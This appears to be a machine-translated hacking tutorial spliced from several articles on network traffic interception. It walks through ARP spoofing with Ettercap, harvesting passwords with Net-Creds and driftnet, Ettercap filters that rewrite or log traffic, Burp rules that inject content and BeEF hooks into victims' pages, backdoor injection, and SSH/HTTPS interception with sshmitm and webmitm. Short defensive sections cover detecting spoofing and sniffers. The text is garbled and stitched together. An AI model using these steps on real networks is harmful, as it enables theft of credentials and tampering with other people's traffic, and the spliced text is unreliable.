home › Installation and configuration › Hackers use it to redirect traffic. Methods of hacker attacks. Data spoofing with Burp

Hackers use it to redirect traffic. Methods of hacker attacks. Data spoofing with Burp

Methods for intercepting network traffic

Listening to the network using network analyzer programs is the first, most in a simple way data interception.

To protect against network eavesdropping, use special programs, for example, AntiSniff, which are capable of identifying computers on the network that are listening to network traffic.

To solve their problems, antisniffer programs use a special sign of the presence of listening devices on the network - the network card of the sniffer computer must be in a special listening mode. While in listening mode, network computers react in a special way to IP datagrams sent to the host being tested. For example, listening hosts typically process all incoming traffic, not just datagrams sent to the host's address. There are other signs that indicate suspicious host behavior that AntiSniff can recognize.

Undoubtedly, eavesdropping is very useful from the point of view of an attacker, since it allows one to obtain a lot of useful information - passwords transmitted over the network, addresses of network computers, confidential data, letters, etc. However, simple eavesdropping does not allow a hacker to interfere with network communication between two hosts in order to modify and corrupt data. To solve such a problem, more complex technology is required.

Rice. 1 False ARP requests

Let's see how a hacker can use ARP to intercept network communications between hosts A and B.

To intercept network traffic between hosts A and B, the hacker imposes his IP address on these hosts, so that A and B use this falsified IP address when exchanging messages. To impose his IP address, the hacker performs the following operations.

The attacker determines the MAC addresses of hosts A and B, for example, using the nbtstat command from the W2RK package.
The attacker sends messages to the identified MAC addresses of hosts A and B, which are falsified ARP responses to requests for resolving the hosts' IP addresses to the MAC addresses of computers. Host A is informed that the IP address of host B corresponds to the MAC address of the attacker’s computer; host B is informed that the IP address of host A also corresponds to the MAC address of the attacker’s computer.
Hosts A and B store the received MAC addresses in their ARP caches and then use them to send messages to each other. Since IP addresses A and B correspond to the MAC address of the attacker’s computer, hosts A and B, unsuspectingly, communicate through an intermediary who can do anything with their messages.

To protect against such attacks, network administrators must maintain a database with a table of correspondence between the MAC addresses and IP addresses of their network computers.

On UNIX networks, this type of spoofed ARP request attack can be implemented using system utilities for monitoring and managing network traffic, for example, arpredirect. Unfortunately, such reliable utilities do not seem to be implemented on Windows networks. For example, on the NTsecurity website you can download the GrabitAII utility, presented as a tool for redirecting traffic between network hosts. However, a basic check of the functionality of the GrabitAII utility shows that complete success in implementing its functions is still far away.

To intercept network traffic, an attacker can spoof the real IP address of a network router with their own IP address, doing this, for example, using falsified ICMP Redirect messages. Host A must, according to RFC-1122, perceive the received Redirect message as a response to a datagram sent to another host, for example, B. Host A determines its actions on the Redirect message based on the contents of the received Redirect message, and if datagram redirection is specified in Redirect from A to B along a new route, this is exactly what host A will do.

Rice. 2 False routing

To perform false routing, the attacker must know some details about the organization local network, in which host A is located, in particular, the IP address of the router through which traffic is sent from host A to B. Knowing this, the attacker will generate an IP datagram in which the sender’s IP address is defined as the router’s IP address, and the recipient is specified host A. Also included in the datagram is an ICMP Redirect message with the new router's address field set to the IP address of the attacker's computer. Having received such a message, host A will send all messages to the IP address of the attacker's computer.

To protect against such an attack, you should disable (for example, using a firewall) the processing of ICMP Redirect messages on host A, and the tracert command (in Unix this is the tracerout command) can reveal the IP address of the attacker’s computer. These utilities are capable of finding an additional route that has appeared on the local network that was not provided for during installation, unless, of course, the network administrator is vigilant.

The above examples of interceptions (to which the capabilities of attackers are far from limited) convince us of the need to protect data transmitted over the network if the data contains confidential information. The only method of protection against interceptions of network traffic is the use of programs that implement cryptographic algorithms and encryption protocols and prevent the disclosure and substitution of secret information. To solve such problems, cryptography provides the means to encrypt, sign, and verify the authenticity of messages transmitted over secure protocols.

Practical implementation of all cryptographic methods for protecting information exchange is provided by VPN networks(Virtual Private Network - Virtual private networks).

TCP connection interception

The most sophisticated network traffic interception attack should be considered TCP connection capture (TCP hijacking), when a hacker interrupts the current communication session with the host by generating and sending TCP packets to the attacked host. Next, using the TCP protocol's ability to restore an interrupted TCP connection, the hacker intercepts the interrupted communication session and continues it instead of the disconnected client.

The TCP protocol (Transmission Control Protocol) is one of the basic transport protocols. OSI level, allowing you to establish logical connections over a virtual communication channel. Over this channel, packets are transmitted and received with their sequence recorded, the flow of packets is controlled, retransmission of distorted packets is organized, and at the end of the session the communication channel is broken. TCP is the only protocol basic protocol from the TCP/IP family, which has an advanced message identification and connection system.

Overview of software packet sniffers

All software sniffers can be divided into two categories: sniffers that support launching from command line, and sniffers with a graphical interface. However, we note that there are sniffers that combine both of these capabilities. In addition, sniffers differ from each other in the protocols they support, the depth of analysis of intercepted packets, the ability to configure filters, and the possibility of compatibility with other programs.

Usually the window of any sniffer with graphical interface consists of three areas. The first of them displays the summary data of intercepted packets. Typically, this area displays a minimum of fields, namely: packet interception time; IP addresses of the packet sender and recipient; MAC addresses of the sender and recipient of the packet, source and destination port addresses; protocol type (network, transport or application layer); some summary information about the intercepted data. The second area displays statistical information about the individual selected package, and finally the third area displays the package in hexadecimal or ASCII character form.

Almost all packet sniffers allow you to analyze decoded packets (which is why packet sniffers are also called packet analyzers, or protocol analyzers). The sniffer distributes intercepted packets across layers and protocols. Some packet sniffers are capable of recognizing the protocol and displaying the captured information. This type of information is usually displayed in the second area of the sniffer window. For example, any sniffer can recognize the TCP protocol, and advanced sniffers can determine which application generated this traffic. Most protocol analyzers recognize over 500 different protocols and can describe and decode them by name. The more information a sniffer can decode and display on the screen, the less will have to be decoded manually.

One problem that packet sniffers may encounter is the inability to correctly identify a protocol using a port other than the default port. For example, to improve security, some well-known applications may be configured to use ports other than the default ports. So, instead of the traditional port 80 reserved for the web server, this server You can forcefully reconfigure it to port 8088 or any other. Some packet analyzers in this situation are not able to correctly determine the protocol and display only information about the lower-level protocol (TCP or UDP).

There are software sniffers that come with software analytical modules as plugins or built-in modules that allow you to create reports with useful analytical information about intercepted traffic.

Another characteristic feature of most software packet analyzers is the ability to configure filters before and after traffic is captured. Filters select certain packets from the general traffic according to a given criterion, which allows you to get rid of unnecessary information when analyzing traffic.

Alternatives to Ettercap

Ettercap is the most popular man-in-the-middle attack software, but is it the best? Throughout the entire instructions, you will see that Ettercap is almost never used alone, that one or another program is always built with it in a traffic processing chain. Perhaps this adds flexibility; in general, this approach is the basis of UNIX - one program performs one task, and the end user combines various programs to achieve the desired result. With this approach, program code is easier to maintain; from such miniature “bricks” you can build a system of any complexity and flexibility. However, having five open consoles with different tasks, the work of whose programs are aimed at achieving one single result, is not very convenient, it is simply more complicated, there is a possibility of making a mistake at some stage, and the entire configured system will work in vain.

Net-Creds sniff:

Visited URLs
POST requests sent
logins/passwords from HTTP forms
logins/passwords for basic HTTP authentication
HTTP lookups
FTP logins/passwords
IRC logins/passwords
POP logins/passwords
IMAP logins/passwords
Telnet logins/passwords
SMTP logins/passwords
SNMP community string
all supported NTLMv1/v2 protocols like HTTP, SMB, LDAP, etc.
Kerberos

A good selection of intercepted ones, and driftnet is simpler in this regard - it only shows intercepted images.

Switch your machine to forwarding mode.

Echo "1" > /proc/sys/net/ipv4/ip_forward

Launch Ettercap with a graphical interface (-G):

Ettercap-G

Now select Hosts, there is a sub-item Scan for hosts. After the scan is complete, select Hosts list:

As Target1, select the router (Add to Target 1), as Target2 select the device you will attack (Add to Target 2).

But here the first hitch may arise, especially if there are many hosts. In various instructions, including in the video presented above, the authors climb into the target machine (everyone, for some reason, has Windows) and using the command they look at the IP of this machine on the local network. Agree, this option is unacceptable for real conditions.

If you scan using , you can get some Additional information about hosts, more precisely, about the network card manufacturer:

Nmap -sn 192.168.1.0/24

If the data is still not enough, then you can do a scan to determine the OS:

Nmap -O 192.168.1.0/24

As we can see, the machine with IP 192.168.1.33 turned out to be Windows, if this is not a sign from above, then what is it? 😉 LOL

This is what we are adding as a second goal.

Now go to the menu item Mitm. There, select ARP poisoning... Check the box for Sniff remote connections.

We begin to harvest, in one window we launch

Net-creds

in another (both programs can be run without options)

Driftnet

Data collection began immediately:

On the right side, driftnet has opened another window in which it shows the intercepted images. In the net-creds window we see visited sites and intercepted passwords:

1.2 Ettercap + Burp Suite
3. View data (sites visited and captured passwords) in Ettercap

In the View menu we have access to the Connections and Profiles tabs. You can also check the Resolve IP addresses box. Connections are, of course, connections. Ettercap collects profiles in memory for each host it discovers. Users and passwords are collected there. In this case, profiles with captured account data (passwords) are marked with a cross:

There is no need to rely too much on profiles - for example, intercepted logins and passwords for FTP and other services are marked, for which the program can clearly interpret the information received as credentials. This does not include, for example, basic authentication data, logins and passwords entered into web forms.

In Connections, the most promising data is marked with an asterisk:

You can double-click on these entries to view details:

In order not to search for these stars throughout the list, you can sort by this field and they will all appear at the top or bottom:

Caught Basic Authentication:

These are the intercepted credentials for VKontakte:

Also, the most interesting data is collected in the lower console:

If you want to save the results of the program, then use these options (specify the keys when starting Ettercap:

Logging options: -w, --write write captured data to pcapfile -L, --log write all traffic to this -l, --log-info write only passive information to this -m, --log-msg write all messages in this -c, --compress use gzip compression for log files

4. On-the-fly data substitution in Ettercap
4.1 Using Ettercap Custom Filters

Note: Despite all the testing, the Ettercap filters still did not work for me. It’s hard to understand whether it’s a matter of hands, hardware features, or an error in the program itself... But for version 0.8.2 (the latest at the moment), there is a bug report about problems with filters. In general, judging by bug reports and forums, filters either fall off often or have not worked at all for a long time. There is a branch where changes were made 5 months ago https://github.com/Ettercap/ettercap/tree/filter-improvements, i.e. filter-improvements (with filter improvements). Both for this branch and for the version from the repository, a wide variety of tests were made, various filters were tested under different conditions, a lot of time was spent, but there was no result. By the way, to install the filter-improvements version in Kali Linux you need to do this:

Sudo apt-get remove ettercap-graphical ettercap-common sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build cd build cmake ENABLE_PDF_DOCS =On ../ make sudo make install

In general, if your filters do not work, then you are not alone. In the instructions about Ettercap, I cannot skip the topic of filters, so they will be discussed in any case.

So far we have been using Ettercap for ARP spoofing. This is a very superficial application. Thanks to custom filters, we can intervene and change traffic on the fly. Filters must be contained in separate files and must be compiled using the Etterfilter program before use. Although the documentation to which the link is given seems scant, but coupled with the examples given below, it will allow you to write quite interesting filters.

Let's create our first filter, it will replace all images with this:

In a file named img_replacer.filter copy:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Accept-Encoding")) ( replace("Accept-Encoding", "Accept-Rubbish!"); # note: the replacement string is the same length as the original msg("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=", " src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC=", "src=\"http://www.irongeek.com/images/jollypwn. png\" "); replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC =", "src=\" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); )

Compile the file:

Etterfilter img_replacer.filter -o img_replacer.ef

Compilation results:

Etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team 14 protocol tables loaded: DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 constants loaded: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP Parsing source file "img_replacer.filter" done. Unfolding the meta-tree done. Converting labels to real offsets done. Writing output to "img_replacer.ef" done. -> Script encoded into 18 instructions.

The -F switch tells the program to load the filter from the file that follows the switch. After compilation, the name of our new file with the filter is img_replacer.ef, so the command takes the form:

Ettercap -G -F img_replacer.ef

Note: When you monitor web traffic, the packets you see may be in encrypted form. For efficient work filters, Ettercap needs traffic in the form plain text. According to some observations, the encoding type that web pages use is "Accept-Encoding: gzip, deflate"

Below is a filter that overwrites the encoding, forcing communication in the form of plain text:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) ( replace("gzip", " "); # note: four spaces in the replaced string msg ("whited out gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( replace("deflate", " "); # note: seven spaces in the replaced line msg("whited out deflate\n"); ) )

The syntax for writing filters is described in detail, and then there are a few more examples:

# replacing text in a packet: if (ip.proto == TCP && search(DATA.data, "lol"))( replace("lol", "smh"); msg("filter ran"); ) # show message , if tcp port is 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH packet\n"); ) ) # write down the entire telnet traffic, also execute ./program for each packet if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./logfile.log "); exec("./program"); ) ) # log all traffic except http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log(DATA.data , "./logfile.log"); ) # some operations on the packet payload if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = "modified"; DATA .data + 20 = 0x4445; ) # drop all packets containing "ettercap" if (search(DECODED.data, "ettercap")) ( msg("some one is talking about us...\n"); drop( ); kill(); ) # record decrypted ssh packets matching the regular expression if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # killing packets if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Data substitution using Burp

We launch Ettercap and Burp as described in paragraph 1.2 or in paragraph 2.2.

In Burp, go to Proxy -> Options. We find Match and Replace there. Click Add to add a new rule.

Request header is the request header
Request body - request body
Response header - response header
Response body - response body
Request param name - Request parameter name
Request param value - Request parameter value
Request first line - First line of the request

If you need to change the data transmitted by the GET method, then this applies to headers.

In HTML markup there is also such a thing as head (head tag). Those mentioned just above have nothing to do with this title. A little higher we talk about packet headers. If you want to change the content HTML pages, then you should always select Response body instead of Request header, even if you are going to change the contents of the head tag (for example, the title).

If you are not familiar with regular expressions, then, in principle, there’s nothing to worry about: HTML forgives a lot, and what it doesn’t understand, it simply ignores - you can use it. If you know how to use regular expressions, then I respect you.)))

For example, let's create a new rule, changing Request header to Response body. In the rule itself we will change

No Title

Check the Regex match box.

Now on all sites (without HTTPS) the title will be No Title:

Insert an arbitrary line after the body tag (it will be the first line in the text). Request header is changed to Response body. We change

Check the Regex match box.

In the upper right corner (depending on the layout) the inscription “I am cool!” appears. You can insert CSS, JavaScript code, any text - anything. You can generally remove everything from the page, and then fill it with your own content - it all depends on your imagination.

The idea was to slightly modify each form so that the data would be sent to the original server and to the attacker’s server (implement multi-submit for each form). But having reasoned that if the transmitted data is not encrypted and we have access to it, then we already see it, there is no need to send it to any server. However, if someone needs a really working example of sending data from one form to several servers at once.

5. Hookup on BeEF

To start using the capabilities of BeEF, we need to embed a JavaScript file in the HTML code, usually a line like:

The next two methods differ only in the method of embedding this string.

5.1 Hooking up BeEF using Ettercap filters

[section to be prepared later]

5.2 Hooking up BeEF with Burp

You need to start exactly as written in paragraph 4.2. Only instead of replacing headers and adding text to the site, we will implement JavaScript code in the form of a line:

In my case, this file is available on IP 192.168.1.36 on port 3000. The file is called hook.js (can be changed in the settings). Those. in my case I need to inject the line:

This can be done, for example, by creating a new rule, changing Request header to Response body. Replacement must occur in the HTML code itself

Great, when you open any website that does not have HTTPS, JavaScript code is inserted into the HTML code, which allows you to collect information through a hooked browser and carry out various attacks:

6. Infection with backdoors

You can replace and infect executable files using both Ettercap filters [which for some reason no longer work] and using third party applications. For example, BDFProxy can do this on the fly. Unfortunately, BDFProxy is still reeling from the April 2016 Backdoor Factory update: the libmproxy package was renamed mitmproxy in Python. For BDFProxy, the libmproxy package is a necessary dependency; without this package the program will not start. Therefore, now, before the “repair” of BDFProxy, it is impossible to use it, because even with Backdoor Factory installed, the BDFProxy program complains about the absence of the libmproxy library...

A similar operation can be done with Burp Suite. The step-by-step algorithm is presented; it makes no sense to rewrite it again in this section.

7. Using Ettercap plugins

Information about Ettercap plugins can be found. There are quite a lot of plugins; the ones described below seem to me the most interesting.

Plugins can be connected when Ettercap is launched, there is an option for this:

P, --plugin run this

Plugins can also be loaded from the GUI:

[MATERIAL UNDER PREPARATION]

7.1 arp_cop

It reports suspicious ARP activity by passively monitoring ARP requests/responses. It can report ARP poisoning attempts or simple IP conflicts or IP changes. If you are building an initial list of hosts, the plugin will work more accurately.

Ettercap -TQP arp_cop //

An example of real detection of ARP spoofing:

Expand

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // password for mial: ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Listening on: eth0 -> 08:00:27:A3:08:4A 192.168.1.36/ 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL dissection needs a valid "redir_command_on" script in the etter.conf file Privileges dropped to EUID 65534 EGID 65534... 33 plugins 42 protocol dissectors 57 ports monitored 20530 mac vendor fingerprint 1766 tcp OS fingerprint 2182 known services Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |====== ===========================================>| 100.00 % 3 hosts added to the hosts list... Starting Unified sniffing... Text only Interface activated... Hit "h" for inline help Activating arp_cop plugin... arp_cop: plugin running... arp_cop: (new host ) 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING ) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING ) 192.168.1.35 pretends to be 192.168 .1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168 .1.1 arp_cop: (WARNING) 192.168 .1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168 .1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretend s to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: ( WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192. 168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192. 168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168. 1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168. 1.1 arp_cop: (WARNING) 192.168. 1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1 arp_cop: (WARNING) 192.168. 1.35 pretends to be 192.168.1.1 . ...........................

7.2 autoadd

It will automatically add new victims as they connect to the ARP poisoning mitm attack. It looks for ARP requests on the local network, and if detected, the plugin will add the host to the list of victims if the list was specified as a TARGET. The host is added when an arp request is visible from it.

7.3 chk_poison

It checks to see if arp etch modules in ettercap are successful. It sends spoofed ICMP echo packets to all baiting victims while pretending to be each victim. It can catch an ICMP response with our MAC address as the destination, which means that the baiting between the two targets is successful. It checks both paths of each connection.

7.4 dns_spoof

This plugin interrupts DNS requests and responds with a spoofed (fake) response. You can choose which address the plugin should respond to by editing the etter.dns file. The plugin intercepts A, AAAA, PTR, MX, WINS, SRV and TXT requests. If it was an A request, then the name is looked up in the file and the IP address is returned (you can use wildcards in the name).

The same applies to AAAA requests.

7.5 find_conn

A very simple plugin that listens for ARP requests to show you all the targets that the host wants to communicate with. It can also help you find addresses on unknown LANs.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Tries to identify ettercap packets sent to the LAN. It can be useful in identifying someone trying to use ettercap. Don't rely on it 100% as the tests only work on specific sequences/ID numbers.

7.7 scan_poisoner

Will check to see if anyone is baiting between any of the hosts on the list and us. First, it checks whether two hosts in the list have the same mac address. This may mean that one of them is poisoning us by pretending to be the other. It can generate a lot of false positives in a proxy-arp environment. You must build a list of hosts to perform this check. After that, it sends icmp echo packets to each host in the list and checks whether the mac address of the response source is different from the address we stored in the list with that IP. This could mean that someone is baiting this host by pretending to have our IP address and forwarding the intercepted packets to us. You cannot run this active test in unoffensive mode.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

It tries to find if anyone is sniffing (listening) in promiscuous mode. It sends two different poorly formed arp requests to each target in the host list and waits for responses. If the response came from the target host, it is more or less likely that the target has the network card in promiscuous mode. It may generate false alarms. You can run it either from the command line or from the plugins menu. Since it listens for arp responses, it will be better if you don't use them while sending arp requests.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

An example of successfully guessing two network cards in promiscuous mode:

Expand

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Listening on: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/255.255.255.0 fe80::a00: 27ff:feaf:30b9/64 SSL dissection needs a valid "redir_command_on" script in the etter.conf file Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0. Privileges dropped to EUID 65534 EGID 65534... 33 plugins 42 protocol dissectors 57 ports monitored 20388 mac vendor fingerprint 1766 tcp OS fingerprint 2182 known services Lua : no scripts were specified, not starting up! Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |=========================================== ====================>| 100.00% 5 hosts added to the hosts list... Starting Unified sniffing... Text only Interface activated... Hit "h" for inline help Activating search_promisc plugin... search_promisc: Searching promisc NICs... Less probably sniffing NICs : - 192.168.1.36 - 192.168.1.34 Most probably sniffing NICs: - NONE Closing text interface... Terminating ettercap... Lua cleanup complete! Unified sniffing was stopped.

7.9 sslstrip

During an SSL mitm attack, ettercap replaces the real SSL certificate with its own. The fake certificate is created on the fly and all fields are filled in in accordance with the real certificate presented by the server.

(62%)

(56.5%)

(RANDOM - 0.2%)

In this article we will look at attacks like Man-in-the-Middle, or rather the method
redirecting SSH and HTTP traffic using the Man in the Middle attack. Let's not pull the cat by the tail, but let's get down to business.

Man in the Middle (in short MitM, from Russian simply - “attack of the middleman” or “man
in the middle") is a type of attack based on redirecting traffic between two machines to intercept information - further study, destroy or modify it. So, the first thing we need is the dsniff package (you will see a link to the package at the end of the article). Why Yes, because this package contains all the necessary utilities, including sshmitm (redirecting SSH traffic) and httpmitm (redirecting HTTP traffic), which can bypass the following security scheme: as far as you know, protocols with data encryption are quite -they are "secure" (encryption helps :)) and do not allow attacks to be carried out "on top" of the network layer. The encryption key is unknown to the hacker - it is impossible to decrypt the data and insert a command too. Everything seems fine, but here's how
since the MitM attack programs (sshmitm and httpmitm) from the dsniff package are able to bypass this system security (you can bypass almost everything). This is all done according to the following principle:
the intermediate host receives the request from the client, "telling" it that it is the server, then connecting to the real server.
The second thing we need is straight arms, the fourth thing - the most important thing - is desire, and, of course, a victim, that is, the computer that we will attack.

Redirecting SSH traffic

After preparing the tools, you understood what was what and why :). Get sshmitm - now we will redirect SSH traffic (everything that you didn’t understand with the theoretical part - read above)
using it, taking advantage of the shortcomings of today's PKI (public key infrastructure - a key management scheme based on
methods of asymmetric cryptography). Let's look at the syntax
sshmitm:

sshmitm [-d] [-I] [-p port] host

D
allow debug output (i.e. more advanced mode)

I
session hijacking

P port
listening port

host
address of the remote host whose sessions will be intercepted

port
port on the remote host

Everything seems simple and tasteful - there is nothing complicated :). Let's start implementing the attack!

# sshmitm server.target.gov // specify your SSH server
sshmitm: relaying to server server.target.gov

Since we do not have a real SSH key, the command interpreter of the attacked
will display a request to check the host key, it will all look something like this:

clientmachine$ server.target.gov
@WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
Please contact your system administrator.

And then the user will decide whether to connect or not. If yes, then we will have full control over the SSH session.
BUT! If the user has never connected to that car, the following message may be displayed:

The authenticity of host "server.target.gov" can"t be established
RSA key fingerprint is
bla:bla:bla;bla;bla........
Are you sure you want to continue connecting (yes/no)?

Here the user also has two choices - to connect or not. If yes, then we intercepted the session, if not, then alas... :(.
In general, the attack was successful if the user connected, and sshmitm, in turn, recorded all passes and logins, and in a very readable manner :)
Naturally, this is not the only SSH session interceptor, but once you become familiar with this, you can easily master another one :)

Redirecting HTTP Traffic

Now we will redirect HTTP traffic. Again, we will need a previously selected tool: httpmitm, which listens to ports 80 (HTTP -) and 443 (HTTPS -), intercepts WEB requests, then connects to the server and forwards the requests to the client computer. The program also generates SSL keys and SSL certificates using OpenSSL. Then, after trying
connects to the site (target.gov), the browser will check the SSL certificate. Since the certificates will not match, the user’s browser will warn about
incorrect SSL certificate. From the attacker's perspective it will look something like this:

#webmitm -d
webmitm: relaying transparently
webmitm: new connection from
GET [link]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[version]
Connection: [type]
Host: www.target.gov
User-Agent: [system, browser information]
[etc, etc, etc]
Cookie: [cookies]

This is how it all looks from the outside -
the SSL connection is intercepted, capturing unencrypted data.

Conclusion

In this article, we looked at the redirection of SSH and HTTP traffic using the Man in the Middle attack - clearly, in detail, briefly. Other HTTP and SSH redirectors
You will master traffic using MitM quickly if you have mastered these too :)). If something was unclear, then...

Interception of data over a network is the receipt of any information from a remote computer device. It may consist of the user’s personal information, his messages, and records of website visits. Data capture can be carried out by spyware or using network sniffers.

Spyware is special software that can record all information transmitted over a network from a specific workstation or device.

A sniffer is a program or computer technology that intercepts and analyzes traffic that passes through a network. The sniffer allows you to connect to a web session and perform various operations on behalf of the computer owner.

If information is not transmitted in real time, spyware generate reports that make it convenient to view and analyze information.

Network interception can be carried out legally or illegally. The main document fixing the legality of obtaining information is the Convention on Cybercrime. It was created in Hungary in 2001. The legal requirements may vary slightly from state to state, but the key message is the same for all countries.

Classification and methods of intercepting data over the network

In accordance with the above, interception of information over a network can be divided into two types: authorized and unauthorized.

Authorized data capture is carried out for various purposes, ranging from protecting corporate information to ensuring national security. The grounds for performing such an operation are determined by legislation, special services, law enforcement officials, and specialists administrative organizations and company security services.

There are international standards for performing data interception. The European Telecommunications Standards Institute has managed to harmonize a number of technical processes (ETSI ES 201 158 “Telecommunications security; Lawful Interception (LI); Requirements for network functions”) on which the interception of information is based. As a result, a system architecture was developed that helps secret service specialists and network administrators legally obtain data from the network. The developed structure for implementing data interception over the network is used for wired and wireless systems voice calls, as well as correspondence by mail, transmission of voice messages over IP, exchange of information via SMS.

Unauthorized interception of data over a network is carried out by attackers who want to take possession of confidential data, passwords, corporate secrets, addresses of computer machines on the network, etc. To achieve their goals, hackers usually use a network traffic analyzer - a sniffer. This program or a hardware-software device gives the fraudster the ability to intercept and analyze information within the network to which the victim user is connected, including encrypted SSL traffic through certificate spoofing. Traffic data can be obtained in different ways:

listening to the network interface,
connecting an interception device to a channel break,
creating a traffic branch and duplicating it to the sniffer,
by carrying out an attack.

